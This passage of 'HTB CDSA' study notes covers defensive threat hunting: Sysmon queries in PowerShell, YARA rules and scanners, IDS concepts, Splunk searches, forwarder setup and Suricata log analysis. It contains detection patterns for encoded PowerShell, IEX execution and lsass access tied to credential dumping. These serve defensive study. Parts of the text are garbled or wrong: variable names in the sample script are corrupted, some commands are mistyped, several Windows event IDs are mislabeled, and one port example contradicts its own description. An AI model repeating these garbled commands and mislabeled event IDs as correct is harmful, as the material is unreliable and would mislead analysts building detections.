Identify uncommon or suspicious network connections,
such as connections to external IPs over unusual ports or
known bad IP addresses.
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" |
     Where-Object { $_.Id -eq 3 -and $_.Message
 -match "192.168.1.1" } # Replace with known
 suspicious IP or range
This command can help filter for outbound connections,
which can indicate exfiltration or C2 communication.
Suspicious DLL Injection
Attackers may inject malicious DLLs into legitimate
processes to evade detection. Look for unusual DLL load
paths or known malicious DLLs.
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" |
     Where-Object { $_.Id -eq 7 -and $_.Message
 -match "AppData\\Local" }
Since DLLs are typically loaded from       System32 , seeing
them load from directories like        AppData or Temp can be
a red flag.
                           382 / 547
                             HTB CDSA
Detecting Persistence Techniques (Registry
Monitoring)
Persistence can be achieved by modifying registry keys
related to autostart and scheduled tasks. Common keys
include
HKCU\Software\Microsoft\Windows\CurrentVersion\R
un .
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" |
     Where-Object { $_.Id -in 12, 13, 14 -and
 $_.Message -match
 "Software\\Microsoft\\Windows\\CurrentVersion\
 \Run" }
This query will show registry modifications related to
startup applications, which are commonly used for
persistence.
Tracking Credential Dumping
Look for suspicious process access attempts to processes
like   lsass.exe ,   which are often targeted in credential
dumping attacks.
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" |
     Where-Object { $_.Id -eq 10 -and
 $_.Message -match "lsass.exe" }
                              383 / 547
                           HTB CDSA
Processes attempting to read       lsass.exe     memory are
often linked to credential dumping tools, such as
Mimikatz.
Proactive Threat Hunting Techniques
Baseline Normal Activity
To effectively hunt for anomalies, establish baselines for
normal behavior in your environment. Monitor typical
processes, network activity, and registry modifications
for specific systems and users. Deviations from this
baseline can then be prioritized for deeper investigation.
Use YARA Rules and Sysmon Configurations
Integrate YARA rules to detect specific malware signatures
and Sysmon configurations that filter for high-risk events.
For instance, you can set Sysmon to log only events
relevant to known attack techniques and exclude noise,
increasing the efficiency of your hunting efforts.
Look for Command-Line Obfuscation
Command-line obfuscation, like using encoded PowerShell
commands or bypassing execution policies, is common in
malware. Search for command-line strings with         -
EncodedCommand     or   -bypass         flags.
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" |
                            384 / 547
                           HTB CDSA
     Where-Object { $_.Id -eq 1 -and $_.Message
 -match "-EncodedCommand" }
Search for Suspicious Parent-Child Process
Relationships
Some parent-child process pairs are suspicious, such as
winword.exe    spawning   powershell.exe ,   which can
indicate malware executed from a malicious document.
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" |
     Where-Object { $_.Id -eq 1 -and $_.Message
 -match "winword.exe.*powershell.exe" }
Automating Threat Hunting with Scripts
Create PowerShell scripts that automatically query Sysmon
logs for known IoCs or patterns, then run these scripts
regularly or schedule them with Task Scheduler.
Example script for basic threat hunting:
 # Define suspicious keywords or patterns
 $|0c0_Pa V = @("Invoke-Expression",
 "EncodedCommand", "powershell.*IEX",
 "winword.exe.*powershell.exe")
 # Check Sysmon logs for each pattern
 foreach ($|a V in $|0c0_Pa V) {
     Write-Output "Searching for pattern:
                           385 / 547
                          HTB CDSA
 $|a V"
     Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" |
         Where-Object { $_.Message -match
 $|a V } |
         Format-Table TimeCreated, Id, Message
 -AutoSize
 }
Integrating Sysmon with SIEM for
Centralized Monitoring
For enterprise environments, it’s recommended to
centralize Sysmon logs in a SIEM for better analysis and
correlation. Integrate Sysmon with a SIEM such as Splunk,
ELK Stack, or Azure Sentinel for improved monitoring and
alerting capabilities.
Benefits of SIEM Integration:
     Centralized Logging: Aggregate Sysmon logs from
     multiple endpoints for holistic analysis.
     Correlating Events: Cross-reference Sysmon logs
     with other security logs (e.g., firewall, AV) to
     detect patterns and anomalies.
     Automated Alerting: Create SIEM rules to trigger
     alerts based on Sysmon event patterns.
Sample SIEM Queries
     Detect PowerShell Abuse:
                           386 / 547
                             HTB CDSA
 index=sysmon EventID=1 Image="*powershell.exe"
 CommandLine="*EncodedCommand*"
Detect Network Connections to Suspicious IPs
 index=sysmon EventID=3 DestinationIp="1.2.3.4"
Replace   "1.2.3.4"   with a known malicious IP.
Common Sysmon Event IDs for Reference
Here are a few commonly used Sysmon event IDs you may
want to filter by:
     Event ID 1: Process Creation
     Event ID 2: File Creation Time Change
     Event ID 3: Network Connection Detected
     Event ID 11: File Creation
     Event ID 12, 13, 14: Registry Events (Object added,
     removed, modified)
     Event ID 17: Pipe Created
     Event ID 18: Pipe Connected
     Event ID 19, 20: WMI Event (EventFilter,
     EventConsumer)
     Group policy modification
     Event ID 4719
     Event ID 4739
     User created or added
     Event ID 4720
     User successfully authenticated
                             387 / 547
                      HTB CDSA
Event ID 4625
Account logon
Event ID 4624
Account logoff
Event ID 4634
Process creation
Event ID 4688
Execution blocked due to restrictive policy
Event ID 4100
Member added to a universal security group
Event ID 4104
Member added from a universal security group
Event 4756
Member removed to a global security group
Event ID 4757
Member removed from a global security group
Event ID 4728
Event ID 4729
Pass The Hash
Passing the hash will generate 2 Event ID 4776 on the
Domain Controller, the first event 4776 is generated
during the authentication of the victim computer, the
second event 4776 indicates the validation of the
account from the originating
computer (infected host), when accessing the target
workstation (victim).
Event ID 4776
Event ID 4624 with a Logon Process of NtLmSSP
and/or an Authentication Package of NTLM.
Account Lockout
Event ID 4625 and/or Event ID 4740.
                      388 / 547
                           HTB CDSA
Common Sysmon Event IDs
Event ID 1: Process Creation
Event ID 5: Process Terminated
Event ID 3: Network Connection
Event ID 7: Image Loaded
Event ID 8: CreateRemoteThread [Persistence operations -
process migration]
Event ID 11: File Created
Event ID 12 / 13 / 14: Registry Event
Event ID 15: FileCreateStreamHash
Event ID 22: DNS Event
Event ID 13: Registry Value Set
Event ID 4720: New user created
Event ID 4103 : Powershell logging enabled
Event ID 4732: A member was added to a group
Event ID 4624: Pass The Hash
Yara Rules
Definition
Yara can identify information based on both binary and
textual patterns, such as hexadecimal and strings
contained within a file. Mainly it's used to create
detection rules that can spot and detect malwares based
on the patterns the malware exhibits such as strings, IPs,
domains,bitcoin wallet for ransom payments, etc. We can
create rules in Yara to search for and spot these
patterns.
Creating Yara Rules
                           389 / 547
                              HTB CDSA
Rule file has the extension    .yar       and inside this file we
can store rules. Every rule must have a name and
condition.
Lets say we create a rule file named          test.yar    and we
want to test it on the home directory, we would type the
below command
 yara test.tar /home
#Example
Below is an example of Yara rule
 rule test {
         condition: 
 }
The name of the rule in this snippet is         test ,   where we
have one condition - in this case,
the condition is   condition .        As previously discussed,
every rule requires both a name and a condition to be
valid. This rule has satisfied those two requirements.
Simply, the rule we have made checks to see if the
file/directory/PID that we specify exists via        condition:
 true . If the file does exist, we are given the output
of test . If the file does not exist, Yara will output an
error.
You can then test rule via the command we showed above
and specify file/directory/PID to check the existence for.
Components of a Yara Rule
                              390 / 547
                              HTB CDSA
#Meta
This section of a Yara rule is reserved for descriptive
information by the author of the rule. For example, you
can use    desc ,   short for description, to summarise what
your rule checks for. Anything within this section does not
influence the rule itself. Similar to commenting code, it is
useful to summarise your rule.
#Conditions
<= less than or equal to
true
any of them
>= more than or equal to
!= not equal to
And to combine conditions, we use the below keywords
and
not
or
#Strings
We can use strings to search for specific text or
hexadecimal in files or programs. For example, say we
wanted to search a directory for all files containing "Hello
World!", we would create a rule such as below. We
define the keyword     Strings        where the string that we
want to search, i.e., "Hello World!" is stored within the
variable   $hello_world .    We need a condition here to
make the rule valid. In this example, to make this string
the condition, we need to use the variable's name. In this
case,   $hello_world .     The condition      any of
them    allows multiple strings to be searched for
                              391 / 547
                              HTB CDSA
 rule helloworld_checker{
     strings:
         $hello_world = "Hello World!"
         $hello_world_lowercase = "hello world"
         $hello_world_uppercase = "HELLO WORLD"
        condition:
            any of them
 }
Yara Scanners
LOKI
LOKI is a free open-source IOC (Indicator of Compromise)
scanner. Its detection is based on four factors
     1. File Name IOC Check
     2. Yara Rule Check
     3. Hash Check
     4. C2 Back Connect Check
        Link
 https://github.com/Neo23x0/Loki/releases
Usage
 python loki.py -h
Scanning the home directory for IOCs
                              392 / 547
                           HTB CDSA
 python -p .loki.py -p /home/
THOR
THOR is IOC (indicator of compromise) and Yara
scanner.There are precompiled versions for Windows,
Linux, and macOS. A nice feature with THOR Lite is its
scan throttling to limit exhausting CPU resources.
Link
 https://www.nextron-systems.com/thor-lite/
yaraGEN
YarGen is a generator for YARA rules from strings found in
malware files while removing all strings that also appear
in goodware files. Therefore yarGen includes a big
goodware strings and opcode database as ZIP archives
that have to be extracted before the first use.
Link
 https://github.com/Neo23x0/yarGen
Update on first use
 python3 yarGen.py --update
Generate a Yara rule from a malicious file
 python3 yarGen.py -m directory --excludegood -
 o file.yar
                            393 / 547
                             HTB CDSA
      -m    is the path to the files you want to generate
     rules for
      --excludegood      force to exclude all goodware
     strings (these are strings found in legitimate
     software and can increase false positives)
      -o    location & name you want to output the Yara
     rule
VALHALLA
Valhalla is an online Yara feed where we can search or
look up Yara rules by keyword, tag, ATT&CK technique,
sha256, or rule name.
Link
 https://valhalla.nextron-systems.com/
Yara Rules with YaraGen for Malware
Detection
Using YARA rules and YaraGen for malware detection is an
effective method for identifying malicious files based on
patterns, characteristics, and behaviors. YARA rules
provide a framework for writing simple but powerful
descriptions of malware patterns, while YaraGen can
assist by automatically generating YARA rules from
malware samples.
Installing YaraGen
   1. Install Python if not already installed.
                             394 / 547
                           HTB CDSA
   2. Install YaraGen by cloning its repository or using
       pip :
 git clone
 https://github.com/Neo23x0/yarGen.git
 cd yarGen
 pip install -r requirements.txt
Running YaraGen
   1. Create a Rule from a Directory of Malware Samples:
 python yarGen.py --malware
 <path_to_malware_samples> --output
 <output_rule_file.yar>
     This command tells YaraGen to analyze all files in the
     specified malware directory and output a YARA rule
     file with the detected patterns.
     Adding Whitelists:
     To reduce false positives, YaraGen can exclude
     patterns found in common or benign files by using a
     whitelist:
 python yarGen.py --malware
 <path_to_malware_samples> --good
 <path_to_benign_samples> --output
 <output_rule_file.yar>
Customizing Output Options:
                           395 / 547
                           HTB CDSA
     Minimal Rules: Generate rules with fewer, more
     unique patterns to reduce noise:
 python yarGen.py --malware
 <path_to_malware_samples> --minimal --output
 <output_rule_file.yar>
Add Metadata: Automatically add metadata fields (e.g.,
author, date, description):
 python yarGen.py --malware
 <path_to_malware_samples> --meta author="Your
 Name" date="2024-01-01" --output
 <output_rule_file.yar>
Example Output from YaraGen
YaraGen generates rules that can contain specific strings,
hex patterns, and keywords unique to the malware
sample(s):
 rule MalwareSampleAutoGen
 {
     meta:
         description = "Auto-generated rule for
 malware sample detection"
         author = "Analyst Name"
         date = "2024-01-01"
      strings:
                           396 / 547
                              HTB CDSA
              $s1 = "example_malicious_string"
              $h1 = { E8 03 00 00 00 5D C3 }
       condition:
           any of them
 }
Testing and Fine-Tuning YARA Rules
After generating YARA rules with YaraGen, it’s essential to
test and fine-tune them to avoid false positives and
ensure accuracy.
Testing YARA Rules
     1. Install YARA if not already installed:
 pip install yara-python
Run YARA Against a Sample:
Test the YARA rule against malware and clean files to
check for accuracy.
 yara -r output_rule_file.yar
 <path_to_test_directory>
     1. The   -r   flag enables recursive scanning of
        directories. Review the output to ensure that the
        rule detects only the intended files.
     2. Use a Testing Environment:
        Run your rules against a mixture of malware
        samples and benign files in a controlled
                              397 / 547
                           HTB CDSA
      environment to verify detection rates and reduce
      false positives.
Fine-Tuning YARA Rules
     Remove Overly Broad Strings: YaraGen may include
     common strings that appear in benign files. Remove
     or refine these to avoid false positives.
     Add Conditions: Use conditions like   all of them    or
     any of them    to adjust rule sensitivity.
     Apply Regex Matching: For more specific matches,
     consider using regex in the strings section of the
     rule.
Examples of Advanced YARA Rules for
Malware Detection
Advanced YARA rules can include conditions that detect
specific malware techniques and behaviors:
Detecting Packed Files
 rule PackedFile
 {
     meta:
         description = "Detects files packed
 with common packers"
     strings:
         $UPX = "UPX!"
         $FSG = "FSG!"
     condition:
                           398 / 547
                         HTB CDSA
          any of ($UPX, $FSG)
 }
Detecting Malware Behaviors
 rule SuspiciousNetworkActivity
 {
     meta:
         description = "Detects network
 activity with suspicious keywords"
     strings:
         $url = "http://"
         $cnc = "CommandAndControl"
         $exfil = "exfil"
     condition:
         any of them
 }
Resources
Online Rules Repository
 https://github.com/InQuest/awesome-yara
 https://github.com/Yara-Rules/rules
Documentations
 https://yara.readthedocs.io/en/stable/writingr
 ules.html
                          399 / 547
                           HTB CDSA
Module 6: SIEM and Detection
Engineering
Splunk
Introduction to IPS & IDS
IDS
Intrusion detection systems (IDSs) monitor a network and
send alerts when they detect suspicious events on a
system or network.
An IDS can only detect an attack. It cannot prevent
attacks. Any type of IDS will use various raw data sources
to collect network activity information.
This includes a wide variety of logs, such as firewall
logs, system logs, and application logs. An IDS reports on
events of interest based on rules configured within the
IDS. All events aren’t attacks or actual issues, but
instead, they provide a report indicating an event might be
an alert or an alarm. The notification of the alert can
come in many forms, including an email to a group of
administrators, a text message, a pop-up window, or a
notification on a central monitor.
Types of Alerts
False positive
A false positive occurs when an IDS or IPS sends an
alarm or alert when there is no actual attack.
False negative
A false negative occurs when an IDS or IPS fails to
send an alarm or alert even though an attack is active.
True negative
                            400 / 547
                            HTB CDSA
A true negative occurs when an IDS or IPS does not
send an alarm or alert, and there is no actual attack.
True positive
A true positive occurs when an IDS or IPS sends an
alarm or alert after recognizing an attack.
Signature-Based Detection
Signature-based IDSs (sometimes called definition-based)
use a database of known vulnerabilities or known attack
patterns. The process is very similar to what antivirus
software uses to detect malware. You need to update
both IDS signatures and antivirus definitions from the
vendor regularly to protect against current threats.
Behavioral Based Detection
The IDS/IPS starts by identifying the network’s regular
operation or normal behavior. It does this by creating a
performance baseline under normal operating conditions.
The IDS continuously monitors network traffic and
compares current network behavior against the baseline.
When the IDS detects abnormal activity (outside normal
boundaries as identified in the baseline), it gives an alert
indicating a potential attack.
HIDS
A host-based intrusion detection system (HIDS) is
additional software installed on a system such as a
workstation or a server. It protects the individual host,
can detect potential attacks, and protects critical
operating system files.
NIDS
A network-based intrusion detection system (NIDS)
monitors activity on the network. NIDS sensors or
collectors could be installed on network devices such as
switches, routers, or firewalls. These sensors gather
information and report to a central monitoring network
                            401 / 547
                            HTB CDSA
appliance hosting a NIDS console. A NIDS cannot detect
anomalies on individual systems or workstations unless
the anomaly causes a significant difference in network
traffic. Additionally, a NIDS is unable to decrypt encrypted
traffic. In other words, it can only monitor and assess
threats on the network from traffic sent in plaintext or
non-encrypted traffic.
Port Mirroring
port mirroring allows us to configure the switch to send
all traffic the switch receives to a single port. After
configuring a port mirror, you can use it as a tap to send
all switch data to a sensor or collector and forward this
to a NIDS console. Similarly, it’s possible to configure
port taps on routers to capture all traffic sent through the
router and send it to the IDS.
IPS
Intrusion prevention systems (IPSs) react to attacks in
progress and prevent them from reaching systems and
networks. An IPS prevents attacks by detecting them and
stopping them before they
reach the target.
IPS vs IDS
An IPS can detect, react to, and prevent attacks.
An IPS is inline with the traffic. In other words, all traffic
passes through the IPS, and the IPS can block malicious
traffic.
Because an IPS is inline with the traffic, it is sometimes
referred to as active.
An IDS monitors and will respond after detecting an
attack, but it doesn’t prevent attacks.
An IDS is out-of-band. It monitors the network traffic, but
the traffic doesn’t go through the IDS.
                             402 / 547
                              HTB CDSA
An IDS is referred to as passive because it is not
inline with the traffic. Instead, it is out-of-band with the
network traffic.
Definitions
Host
It's the name of the physical or virtual device where an
event originates. It can be used to find all data originating
from a specific device.
Source
It's the name of the file, directory, data stream, or other
input from which a particular event originates.
Sources are classified into    source types ,   which can be
either well known formats or formats defined by the user.
Some common source types are HTTP web server logs and
Windows event logs.
Tags
A tag is a knowledge object that enables you
to search for events that contain particular field
values. You can assign one or more tags to any
field/value combination, including event types,
hosts, sources, and source types. Use tags to
group related field values together, or to track
abstract field values such as IP addresses or ID
numbers by giving them more descriptive names.
Indexes
                              403 / 547
                           HTB CDSA
When data is added, Splunk software parses
the data into individual events, extracts the
timestamp, applies line-breaking rules, and
stores the events in an index. You can create new
indexes for different inputs. By default, data is
stored in the “main” index. Events are retrieved
from one or more indexes during a search.
Splunk Forwarder
A Splunk instance that forwards data to another
Splunk instance is referred to as a forwarder.
Splunk Indexer
An indexer is the Splunk instance that indexes data.
The indexer transforms the raw data into events
and stores the events into an index. The indexer
also searches the indexed data in response to
search requests. The search peers are indexers that
fulfill search requests from the search head.
Splunk Search Head
In a distributed search environment, the search
head is the Splunk instance that directs search
requests to a set of search peers and merges
the results back to the user. If the instance
does only search and not indexing, it is usually
referred to as a dedicated search head.
In other words, it's where we execute queries to
retrieves insights from the loaded data
                            404 / 547
                            HTB CDSA
Search Processing Language
It's the language used to perform search operations in
Splunk. SPL or Splunk processing language consists of
keywords, quoted phrases, Boolean expressions,
wildcards,parameter/value pairs, and comparison
expressions.
Unless you’re joining two explicit Boolean expressions,
omit the   AND   operator because Splunk assumes the
space between any two search terms to be     AND
Basic Search Commands
eval
Calculates an expression
*
search through all available logs
rare
Used to find uncommon events. Its the opposite of the
top    command explained below. It returns the least
frequent values.
top
Top most common events. By default it returns top 10
values but it can be tweaked by limiting the output with
the LIMIT keyword.
Below we return the top 8 usernames.
                            405 / 547
                            HTB CDSA
 index=data | top limit=8 username
timechart
Track occurrences of events over time
stats
Gather general statistical information about a search.
head
Include only the first few values found within my search
tail
Include only the last few values found within my search
transaction
The transaction command gives us an easy way to group
events together based on one or more fields and returns a
field called duration that calculates the difference between
the first and last event in a transaction.
dedup
Removes duplicates from a search result.
Below query retrieves events from the index and shows
unique events IDs in a table alongside the associated user.
 index=data | table EventID User|dedup EventID
head/tail N
Returns the first/last N results.
sort
Sorts the search results by the specified fields.
stats
Provides statistics, grouped optionally by fields. See
COMMON STATS FUNCTIONS.
table
Specifies fields to keep in the result set. Retains data in
                            406 / 547
                              HTB CDSA
tabular format.
Below query retrieves data from the index and shows
EventID and username fields in a table.
 index=data | table EventID username
rex
Extract fields according to specified regular expression(s)
rename
It changes the name of the field in the search results. It
is useful in a scenario when the field name is generic or
log, or it needs to be updated in the output.
In the below query, we retrieve the events from the index
and rename the field   User    to         Employees
 index=data | rename User as Employees
_time
Usually used to sort the results based on time starting
with the most recent first.
Reverse
Reverses the events to show the from oldest to the most
recent.
Comparison Operators
Equal
This operator is used to match values against the field. In
this example below, it will retrieve all events where the
field domain equals to example.com
                              407 / 547
                           HTB CDSA
 domain=example.com
Not Equal to
This operator returns all the events where the domain
value does not match example.com.
 domain!=example.com
Less than
Showing all the events where the id is less than 10.
 id<10
Less than or Equal to
Showing all the events where the id is less than or equal
to 10.
 id<=10
Greater than
Showing all the events where the id is more than 10.
 id>10
Greater than or Equal to
Showing all the events where the id is more than or equal
to 10.
 id>=10
                           408 / 547
                           HTB CDSA
Boolean Operators
NOT
Ignore the events where source IP is localhost
 src.ip NOT 127.0.0.1
OR
Return all the events in which destination port equals to
either 80 or 443.
 dst.port=40 OR dst.port=443
AND
Return all the events in which source IP is localhost
destination port is 80.
 src.ip=127.0.0.1 AND dst.port=80
Statistical Functions
Average
This command is used to calculate the average of the
given field.
 stats avg(price)
Max
It will return the maximum value from the specific field.
 stats max(price)
                            409 / 547
                              HTB CDSA
Min
It will return the minimum value from the specific field.
 stats min(price)
Sum
It will return the sum of the fields in a specific value.
 stats sum(price)
Count
The count command returns the number of data
occurrences.
 stats count(ip)
Chart Commands
Chart
Showing the data using charts and other types of
visualization forms based on a specific field. It is usually
used along with the   count     command.
Below we show users chart.
 index=data | chart count by User
Timechart
Same as chart but based on time
 index=data | timechart count by User
                              410 / 547
                            HTB CDSA
Log Monitoring
Continuous Log Monitoring and From A Log
File
We can setup Splunk to import logs from a specific log file
and then set it up to continuously import the logs from the
specified log file. An example would be constantly
monitoring and importing web server logs from to Splunk
from the web server logs.
   1. Log in to your Splunk server.
   2. From the home launcher in the top-right corner,
      click on the Add Data button.
   3. In the Choose a Data Type list, click on A file or
      directory of files.
   4. Click on Next in the Consume any file on this Splunk
      server option.
   5. Select Preview data before indexing and enter the
      path to the logfile (/var/log/apache2/) and click
       on Continue.
   6. Select Start a new source type and click on
      Continue.
   7. Assuming that you are using the provided file or the
      native /var/log/messages file, the data preview
       will show the correct line breaking of events and
       timestamp recognition. Click on the Continue
       button.
   8. A Review settings box will pop up. Enter
       apache_logs    as the source type and then, click
       on Save source type.
                            411 / 547
                             HTB CDSA
    9. A Sourcetype saved box will appear. Select Create
       input.
  10. In the Source section, select Continuously index
      data from a file or directory this Splunk instance
       can access and fill in the path to your data. If you
       are just looking to do a one-time upload of a file,
       you can select Upload and Index a file instead. This
       can be useful to index a set of data that you would
       like to put into Splunk, either to backfill some
       missing or incomplete data or just to take
       advantage of its searching and reporting tools.
  11. Ignore the other settings for now and simply click
       on Save. Then, on the next screen, click on Start
       searching. In the search bar, enter the following
       search over a time range of All time
       `sourcetype=apache_logs
Continuous Log Monitoring Through
Network Ports
Sending data to Splunk over network ports doesn't need to
be limited to network devices. Applications and scripts
can use socket communication to the network ports that
Splunk is listening on. This can be a very useful tool in
your back pocket, as there can be scenarios where you
need to get data into Splunk but don't necessarily have
the ability to write to a file.
    1. Log in to your Splunk server.
    2. From the home launcher in the top-right corner,
       click on the Add Data button.
    3. In the Or Choose a Data Source list, click on the
       From a   UDP port link            or   TCP port link .
                             412 / 547
                           HTB CDSA
   4. Specify the port that you want Splunk to listen on.
   5. In the Source type section, select From list from
       the Set sourcetype drop-down list, and then,
       select syslog from the Select source type from list
       drop-down list.
   6. Click on Save, and on the next screen, click on
       Start searching. Splunk is now configured to listen
       on the port you assigned in step 4. Any data sent
       to this port now will be assigned the syslog source
       type. To search for the syslog source type, you
       can run the following search    sourcetype=syslog
Continuous Log Monitoring Through Splunk
Universal Forwarder
Splunk Universal Forwarder (UF) can be installed on your
remote endpoint
servers and used to forward data back to Splunk to be
indexed. The Universal Forwarder is similar to the Splunk
server in that it has many of the same
features, but it does not contain Splunk web and doesn't
come bundled with the Python executable and libraries.
Additionally, the Universal Forwarder cannot process data
in advance, such as performing line breaking and
timestamp extraction.
To obtain the Universal Forwarder software, you will need
to go to www.
splunk.com/download and register for an account if you
do not already have one. Then, either download the
software directly to your server or download it to your
laptop or workstation and upload it to your server via a
file-transfer process such as SFTP.
                           413 / 547
                            HTB CDSA
1- On the server with the Universal Forwarder installed,
open a command prompt if you are a Windows user or a
terminal window if you are a Unix user.
2- Change to the [$SPLUNK_HOME/bin] directory, where
[$SPLUNK_HOME] is the
directory in which the Splunk forwarder was installed..
For Unix, the default installation directory will be
/opt/splunkforwarder/bin and for Windows, it will be
C:\Program Files\SplunkUniversalForwarder\bin .
3- Start the Splunk forwarder if not already started, using
the following command:    ./splunk start
4- Accept the license agreement.
5- Enable the Universal Forwarder to autostart, using the
following command:    ./splunk enable boot-start
6- Set the indexer that this Universal Forwarder will send
its data to. Replace the host value with the value of the
indexer as well as the username and password for the
                 ./splunk add forward-server
Universal Forwarder
<host>:port -auth <username>:<password> . The
username and password to log in to the forwarder (default
is admin:changeme) is    username:password .     Additional
receiving indexers can be added in the same way by
repeating the command in the previous step with a
different indexer host or IP. Splunk will automatically load
balance the forwarded data if more than one receiving
indexer is specified in this manner. Port 9997 is the
default Splunk TCP port and should only be changed if it
cannot be used for some reason.
                            414 / 547
                            HTB CDSA
7- Log in to your receiving Splunk indexer server. From
the home launcher, in the top-right corner click on the
Settings menu item and then select the Forwarding and
receiving link
8- Click on the Configure receiving link.
9- Click on New.
10 - Enter the port you chose in step   6   in the Listen on
this port field.
11- Click on Save and restart Splunk. The Universal
Forwarder is installed and configured to send data to your
Splunk server, and the Splunk server is configured to
receive data on the default Splunk TCP port the port you
chose in step      6.
Splunk Installation
To install Splunk SIEM on your OS, make sure first to
create an account on splunk.com and go to
this Splunk Enterprise download link to select the
installation package for the latest version.
On Linux
Once you have downloaded the compressed files, simply
uncompress with the below command in elevated
privileges. This step unzips the Splunk installer and
installs all the necessary binaries and files on the system
 tar xvzf splunk_installer.tgz
                            415 / 547
                               HTB CDSA
After the installation is complete, a new folder
named     splunk   which needs to be moved to       /opt
 mv splunk /opt/
 cd /opt/splunk/bin
Then run Splunk
 ./splunk start --accept-license
As it is the first time we are starting
the Splunk instance, it will ask the user for admin
credentials. Create a user account and proceed.
At the very end, Splunk will start and it will give the
access ip and port to login via your browser.
On Windows
Same as above, from the downloads page of Splunk select
Windows as your OS and download the installer.
Run the   Splunk-Instance         installer. By default, it will
install Splunk in the folder     C:\Program Files\Splunk .
This will check the system for dependencies and will take
5-8 minutes to install the Splunk instance.
                               416 / 547
                              HTB CDSA
Next prompt is to create an administration account and
then it will be up and running to be accessed from the
browser
Splunk is installed on port    8000       by default. We can
change the port during the installation process as well. By
default you can open Splunk from below URL
HTTP://127.0.0.1:8000
Collecting Logs
From Linux Machines
Installing The Forwarder
To collect logs from different machines, we need to install
Splunk universal forwarders which gather the logs at the
machine they are installed on and send it to Splunk.
                              417 / 547
                           HTB CDSA
Universal forwarders can be downloaded from the
official Splunk website.
Once you download the forwarder, install it with the below
command
 tar xvzf splunkforwarder.tgz
Same steps when we first installed Splunk, The above
command will install all required files in the
folder   splunkforwarder   which needs to be moved to
/opt
 mv splunkforwarder /opt/
 cd /opt/splunkforwarder
And then we run the forwarder
 ./bin/splunk start --accept-license
By default, Splunk forwarder runs on port 8089. If the
system finds the port unavailable, it will ask the user for
the custom port.
Configuring the receiver
To start sending and collecting logs, now log in to the
main Splunk instance running on the main server and from
the menu head to   settings-forwarding and
receiving
Then click on click on Configure receiving and then
proceed by configuring a new receiving port.
                            418 / 547
                            HTB CDSA
By default, the Splunk instance receives data from the
forwarder on the port   9997    which you can always
change. In the next prompt, just enter your preferred port
and the receiver will be up and running.
Creating The Index
The index is used to store the incoming data from the
machines where the forwarder is installed. If we do not
specify an index, it will start storing received data in the
default index, which is called the      main   index.
From the main menu in Splunk, click on         settings-
indexes
Click the New Index button, fill out the form, and
click Save to create the index. Below we named the new
index   Linux_host
                            419 / 547
                            HTB CDSA
Configuring The Forwarder
Back to the forwarder, we need to configure it to send
the logs to the main receiver we setup in the main Splunk
instance
 cd /opt/splunkforwarder/bin
 ./splunk add forward-server 10.10.10.2:9997
10.10.10.2     is the IP of the main Splunk machine.
Next step is to specify which logs need to be monitored
and forwarded to the main Splunk receiver. Linux logs are
stored under   /var/log/
 ./splunk add monitor /var/log/syslog -index
 linux_host
                            420 / 547
                             HTB CDSA
The above command monitors and sends
/var/log/syslog       logs to the main Splunk receiver.
From Windows Machines
Repeat same steps we did when we installed Forwarder on
the Linux machine except choose Windows OS as the
target OS from the downloads page.
Configuring & Installing The Forwarder
After downloading the installer, run it as shown below
With the next prompt, create an account with a username
and password of your choosing.
In the next step, We must specify the server's IP address
and port number to ensure that our Splunk instance gets
the logs from this host. By default, Splunk listens on
port   9997   for any incoming traffic.
                             421 / 547
                           HTB CDSA
Next step is to configure the logs that will be sent to the
main Splunk listener on the main machine.
From the main menu in the main Splunk instance, Click on
Settings -> Add data and choose the     Forward   option to
get the data from Splunk Forwarder.
In the Select Forwarders section, Click on the host that
shows up in the list (there may be many hosts depending
on how many machines you have installed the forwarder
on).
Next we specify what logs and events to collect
                            422 / 547
                           HTB CDSA
Next we create the index that will store the incoming
Event logs. Once created, select the Index from the list
and continue to the review section to finish.
Click on the Start Searching tab. It will take us to the
Search App. If everything goes smoothly, we will receive
the Event Logs immediately.
Operational Notes
     Its vastly important to determine the source of your
     data to be able to correctly pull the logs/events.
     Specify this source as     index=name-of-the-
     datasource .   If you don't know you can then
     retrieve all data from all sources   index=*   but this
     will retrieve huge amounts of events that you don't
     necessarily need to parse.
     When we are dealing with Windows hosts and looking
     at processes starting, we can view both Windows
     event logs and Sysmon for more information
     Remember that when searching for backslashes to
     add a second backslash, because a single backslash
     is an escape character and will cause your search to
     not run correctly.
                              423 / 547
                          HTB CDSA
   When we analyze a ransomware attack, one of the
   questions we should ask is what connections are the
   impacted systems making to other systems? File
   shares can be leveraged to inflict greater damage by
   encrypting shared data thus increasing the impact of
   the ransomware beyond the individual host.
   Registry data from Windows systems as well as
   Microsoft Sysmon will provide insight into file shares
   Oftentimes we will need to determine which
   destinations an infected system communicated with.
   The first time and last time it occurred are important
   pieces of information in your investigation as well
   In a host-centric environment, we use hostnames
   more frequently than IP addresses. As we start
   looking at our events from a network-centric
   approach, we need to be aware that we may need to
   search by IP as well
   IDS/IPS or Malware Signatures may already exist for
   threats that we need to deal with. Understanding
   what signatures fired is important to understand
   when the threat was seen, where in the network it
   was seen, when it was seen, what technology
   identified the signature and the nature of the threat.
   Stream is a free app for Splunk that collects wire
   data and can focus on a number of different
   protocols, including but not limited to smtp, tcp, ip,
   http and more
Using Splunk For Incident Response
Parsing Suricate IDS Logs
                          424 / 547
                           HTB CDSA
When parsing Suricate IDS events, we mostly aim to
extract data from a specific malware/Trojan that triggered
an alert hence we are interested in displaying the IDS
alerts. A key field you want to focus on is
alert.signature
Scenario One
Say you want to see all IDS [suricata] alerts triggered by
the machine infected with Advanced Persistent Threat.
Infected machine ip is [40.80.148.42]
 index=dataset domain.com src=40.80.148.42
 sourcetype=suricata
Looking for executable files caught in Suricata IDS logs
 index=* sourcetype=suricata .exe
Looking through endpoints to which executable files were
downloaded or uploaded. Make sure to change ip values
 index=botsv1 sourcetype=suricata (dest="ip1"
 OR dest_ip="ip2") .exe
Looking through endpoints to which executable files were
uploaded through http POST request. Make sure to change
ip values by specifying the endpoints using IP and domain
 index=botsv1 sourcetype=suricata
 (dest=domain.com OR dest="ip1")
 http.http_method=POST .exe
                            425 / 547
                            HTB CDSA
#TIP
Using the stats command, we can get a count for each
combination of signature and signature_id. Because the
signature and the id are likely unique, that may not be
